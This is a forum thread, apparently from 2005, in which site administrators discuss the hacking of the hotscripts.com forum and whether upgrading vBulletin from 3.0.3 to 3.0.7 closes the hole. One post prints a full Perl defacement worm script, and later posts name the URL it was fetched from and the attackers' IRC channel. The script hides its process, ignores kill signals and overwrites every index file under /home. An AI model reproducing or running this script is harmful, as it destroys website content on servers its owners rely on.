http://hotscripts.com/ hacked
hotscripts hacked
Collapse
X
-
Tags: None
-
What bad luck.
Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years. -
Originally posted by Dave#What bad luck.
Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.
Also I work for iNET and I didn't work for CommunitechComment
-
-
Also I work for iNET and I didn't work for Communitech
Personally I would find it difficult to work for people like that.Comment
-
I am not php expert but was it this?
PHP Code:#!/usr/bin/perl
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
system("find /home -name index.* >> index");
open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind)
for($a=0;$a<=$b;$a++){
chomp;
system("echo spykids ownz your server > $ind[$a]");
}
system("perl zone.txt");
exit;
Comment
-
-
Don't click this link, but here is where the worm got the script from:
compras.el-nacional.com/spykids.txt
I suggest a safe wget or something other like that.Comment
-
Also, here is what the access log call looks like:
-- Removed - Contact me if needed. ;-)
Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??Last edited by dictionaryof; Sun 6 Mar '05, 10:15am.Comment
-
Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??Comment
-
Some have an irc left there me goes to look
Spykids ownz you!! irc.brasnet.org //j #spy [email protected]Comment
-
Originally posted by Mike SullivanYes. Or if you didn't have "Add Template Name in Comments" enabled.Comment
-
I've reported posts in this thread several times, but publically posting exactly how to exploit vulnrabilities in public is not very smart. That server log shows every tom dick and harry how to exploit it.Dean Clatworthy - Web Developer/DesignerComment
-
log lines removed.
Can someone confirm that the upgrade to 3.0.7 will prevent this from re-occuring...
The upgrade has been completed, but don't want to reopen the forum til it is confirmed.Comment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment